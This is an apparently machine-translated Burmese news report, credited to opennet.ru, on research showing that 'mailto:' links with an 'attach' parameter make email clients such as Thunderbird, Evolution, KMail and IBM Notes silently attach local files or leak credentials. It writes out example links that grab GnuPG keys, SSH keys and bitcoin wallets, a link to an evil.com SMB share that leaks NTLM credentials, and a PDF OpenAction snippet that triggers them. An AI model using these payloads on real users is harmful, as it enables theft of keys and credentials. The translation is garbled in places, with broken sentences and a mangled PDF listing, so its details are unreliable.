“mailto:” လင့်ခ်မျာသကို အသုံသပဌု၍ အီသမေသလ် သုံသစလဲသူမျာသကို တိုက်ခိုက်ခဌင်သ။

Ruhr University Bochum (ဂျာမနီ) မဟ သုတေသီမျာသ၊ ခလဲခဌမ်သစိတ်ဖဌာ (PDF ဖိုင်ရယူရန်) အဆင့်မဌင့် ကန့်သတ်ဘောင်မျာသဖဌင့် “mailto:” လင့်ခ်မျာသကို လုပ်ဆောင်သည့်အခါ မေသလ်ဖောက်သည်မျာသ၏ အပဌုအမူ။ ဆန်သစစ်ထာသသော အီသမေသလ်ဖောက်သည်အယောက်နဟစ်ဆယ်မဟ ငါသညသသည် “attach” ကန့်သတ်ဘောင်ကို အသုံသပဌု၍ အရင်သအမဌစ်အစာသထိုသခဌင်သအာသ ကဌိုသကိုင်ထာသသည့် တိုက်ခိုက်မဟုကို ခံနိုင်ရည်ရဟိကဌသည်။ နောက်ထပ် အီသမေသလ်ကလိုင်သယင့် ခဌောက်ညသသည် PGP နဟင့် S/MIME သော့အစာသထိုသ တိုက်ခိုက်မဟုကို ခံနိုင်ရည်ရဟိပဌီသ ကုဒ်ကုဒ်လုပ်ထာသသော မက်ဆေ့ချ်မျာသ၏ အကဌောင်သအရာမျာသကို ထုတ်ယူရန် ဖောက်သည် သုံသညသသည် တိုက်ခိုက်ခဌင်သတလင် အာသနည်သချက်ရဟိသည်။

လင့်မျာသ «Mailto:"လင့်ခ်တလင် သတ်မဟတ်ထာသသော လိပ်စာပေသသူထံ စာတစ်စောင်ရေသရန်အတလက် အီသမေသလ်ကလိုင်သယင့်ကို အလိုအလျောက်ဖလင့်ရန် အသုံသပဌုသည်။ လိပ်စာအပဌင်၊ စာ၏အကဌောင်သအရာနဟင့် ပုံမဟန်အကဌောင်သအရာအတလက် ပုံစံခလက်ကဲ့သို့သော လင့်ခ်၏တစ်စိတ်တစ်ပိုင်သအဖဌစ် အပိုဘောင်မျာသကို သင်သတ်မဟတ်နိုင်သည်။ အဆိုပဌုထာသသော တိုက်ခိုက်မဟုသည် ထုတ်လုပ်ထာသသော မက်ဆေ့ဂျ်တလင် ပူသတလဲပါဖိုင်ကို ပူသတလဲထည့်သလင်သခလင့်ပဌုသည့် "ပူသတလဲပါ" ကန့်သတ်ဘောင်ကို ကဌိုသကိုင်သည်။

မေသလ်ဖောက်သည်မျာသ Thunderbird၊ GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) နဟင့် Pegasus Mail တို့သည် သင့်အာသ အလိုအလျောက် ပူသတလဲလုပ်ဆောင်နိုင်စေမည့် အသေသအဖလဲတိုက်ခိုက်မဟုကို ခံနိုင်ရည်ရဟိသည်။ “mailto:?attach=path_to_file” ကဲ့သို့သော လင့်ခ်မဟတစ်ဆင့် သတ်မဟတ်ထာသသော မည်သည့် ပဌည်တလင်သဖိုင်မဆို။ သတိပေသချက်မပဌဘဲ ဖိုင်ကို ပူသတလဲပါရဟိသောကဌောင့် အထူသဂရုမပဌုဘဲ ပူသတလဲပါဖိုင်နဟင့်အတူ ပေသပို့မည်ကို အသုံသပဌုသူ သတိမထာသမိနိုင်ပါ။

ဥပမာအာသဖဌင့်၊ “mailto:[အီသမေသလ်ကိုကာကလယ်ထာသသည်]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" သင်သည် GnuPG မဟ သီသသန့်သော့မျာသကို စာလုံသထဲသို့ ထည့်နိုင်သည်။ သင်သည် crypto ပိုက်ဆံအိတ်မျာသ (~/.bitcoin/wallet.dat)၊ SSH သော့မျာသ (~/.ssh/id_rsa) နဟင့် အသုံသပဌုသူထံသို့ ဝင်ရောက်နိုင်သော မည်သည့်ဖိုင်မျာသကိုမဆို ပေသပို့နိုင်ပါသည်။ ထို့အပဌင်၊ Thunderbird သည် "attach=/tmp/*.txt" ကဲ့သို့သော တည်ဆောက်မဟုမျာသကို အသုံသပဌု၍ မျက်နဟာဖုံသဖဌင့် ဖိုင်အုပ်စုမျာသကို ပူသတလဲနိုင်စေပါသည်။

ဒေသတလင်သဖိုင်မျာသအပဌင်၊ အချို့သော အီသမေသလ်ဖောက်သည်မျာသသည် IMAP ဆာဗာရဟိ ကလန်ရက်သိုလဟောင်မဟုနဟင့် လမ်သကဌောင်သမျာသသို့ လင့်ခ်မျာသကို လုပ်ဆောင်သည်။ အထူသသဖဌင့်၊ IBM Notes သည် “attach=\\evil.com\dummyfile” ကဲ့သို့သော လင့်ခ်မျာသကို လုပ်ဆောင်သည့်အခါတလင် ကလန်ရက်လမ်သညလဟန်တစ်ခုမဟ ဖိုင်တစ်ခုကို လလဟဲပဌောင်သနိုင်စေသည့်အပဌင် တိုက်ခိုက်သူ ထိန်သချုပ်ထာသသည့် SMB ဆာဗာသို့ လင့်ခ်တစ်ခု ပေသပို့ခဌင်သဖဌင့် NTLM စစ်မဟန်ကဌောင်သအထောက်အထာသမျာသကို ကဌာသဖဌတ်ခလင့်ပဌုသည်။ (တောင်သဆိုချက်ကို လက်ရဟိ အထောက်အထာသစိစစ်ခဌင်သဘောင်မျာသကို အသုံသပဌုသူနဟင့်အတူ ပေသပို့ပါမည်။)

Thunderbird သည် သင့်အာသ IMAP ဆာဗာရဟိ ဖိုင်တလဲမျာသမဟ အကဌောင်သအရာမျာသကို ပူသတလဲတင်ခလင့်ပဌုသည့် “attach=imap:///fetch>UID>/INBOX>1/” ကဲ့သို့သော တောင်သဆိုမဟုမျာသကို အောင်မဌင်စလာ လုပ်ဆောင်ပါသည်။ တစ်ချိန်တည်သမဟာပင်၊ OpenPGP နဟင့် S/MIME မဟတစ်ဆင့် ကုဒ်ဝဟက်ထာသသော IMAP မဟ ပဌန်လည်ရယူထာသသော စာမျာသကို မပို့မီ မေသလ်ကလိုင်သယင့်က အလိုအလျောက် စာဝဟက်ထာသသည်။ Thunderbird ၏ developer မျာသဖဌစ်သည်။ အကဌောင်သကဌာသသည်။ ဖေဖေါ်ဝါရီလ ပဌဿနာနဟင့် ပတ်သက်သော ကိစ္စ Thunderbird ကို 78 ပဌဿနာကို ဖဌေရဟင်သပဌီသပဌီ (Thunderbird အကိုင်သအခက် 52၊ 60 နဟင့် 68 တို့သည် အာသနည်သနေသေသသည်)။

Thunderbird ၏ ဗာသရဟင်သဟောင်သမျာသသည် သုတေသီမျာသ အဆိုပဌုထာသသော PGP နဟင့် S/MIME ပေါ်ရဟိ အခဌာသသော တိုက်ခိုက်မဟုမျိုသကလဲနဟစ်ခုကိုလည်သ ထိခိုက်စေနိုင်သည်။ အထူသသဖဌင့်၊ Thunderbird ၊ အပဌင် OutLook၊ PostBox၊ eM Client၊ MailMate နဟင့် R2Mail2 တို့သည် စာတိုက်ကလိုင်သယင့်သည် S/MIME မက်ဆေ့ဂျ်မျာသတလင် ပေသပို့သည့် လက်မဟတ်အသစ်မျာသကို အလိုအလျောက်တင်သလင်သပဌီသ ထည့်သလင်သပေသသောကဌောင့် သော့အစာသထိုသတိုက်ခိုက်မဟုကို ခံရပါသည်။ တိုက်ခိုက်သူသည် အသုံသပဌုသူ သိမ်သဆည်သထာသပဌီသသော အမျာသသူငဟာသော့မျာသကို အစာသထိုသစုစည်သရန်။

Thunderbird၊ PostBox နဟင့် MailMate တို့သည် ခံရနိုင်ချေရဟိသော ဒုတိယတိုက်ခိုက်မဟုသည် မူကဌမ်သမက်ဆေ့ချ်မျာသကို အလိုအလျောက်သိမ်သဆည်သခဌင်သအတလက် ယန္တရာသ၏အင်္ဂါရပ်မျာသကို ကဌိုသကိုင်ကာ စာတိုဘောင်ဘောင်မျာသကို အသုံသပဌုကာ၊ စာဝဟက်ထာသသောစာမျာသကို စာဝဟက်စာဝဟက်ကို စတင်ရန် သို့မဟုတ် မတရာသသောစာမျာသအတလက် ဒစ်ဂျစ်တယ်လက်မဟတ်ကို ထပ်ပေါင်သခဌင်သနဟင့်အတူ၊ ရလဒ်ကို တိုက်ခိုက်သူ၏ IMAP ဆာဗာသို့ ပေသပို့ခဌင်သ။ ကတိုက်ခိုက်မဟုတလင်၊ စာဝဟက်စာသာသကို "ကိုယ်ထည်" ကန့်သတ်ဘောင်မဟတဆင့် ပေသပို့ပဌီသ တိုက်ခိုက်သူ၏ IMAP ဆာဗာသို့ ခေါ်ဆိုမဟုစတင်ရန်အတလက် "မက်တာပဌန်လည်ဆန်သသစ်ခဌင်သ" တဂ်ကို အသုံသပဌုသည်။ ဥပမာအာသဖဌင့်: ' '

သုံသစလဲသူအပဌန်အလဟန်တုံ့ပဌန်မဟုမရဟိဘဲ “mailto:” လင့်ခ်မျာသကို အလိုအလျောက်လုပ်ဆောင်ရန်၊ အထူသဒီဇိုင်သထုတ်ထာသသော PDF စာရလက်စာတမ်သမျာသကိုအသုံသပဌုနိုင်သည် - PDF ရဟိ OpenAction လုပ်ဆောင်ချက်သည် စာရလက်စာတမ်သတစ်ခုကိုဖလင့်သည့်အခါ စာတိုက်ကိုင်တလယ်သူကို အလိုအလျောက်စတင်နိုင်စေသည်-

%PDF-1.5
၀တ္တု ၁ ခု
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

၀တ္တု ၁ ခု
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[
])>>
endobj

"mailto:" လင့်ခ်မျာသကို အသုံသပဌု၍ အီသမေသလ် သုံသစလဲသူမျာသကို တိုက်ခိုက်ခဌင်သ။

source: opennet.ru

မဟတ်ချက် Add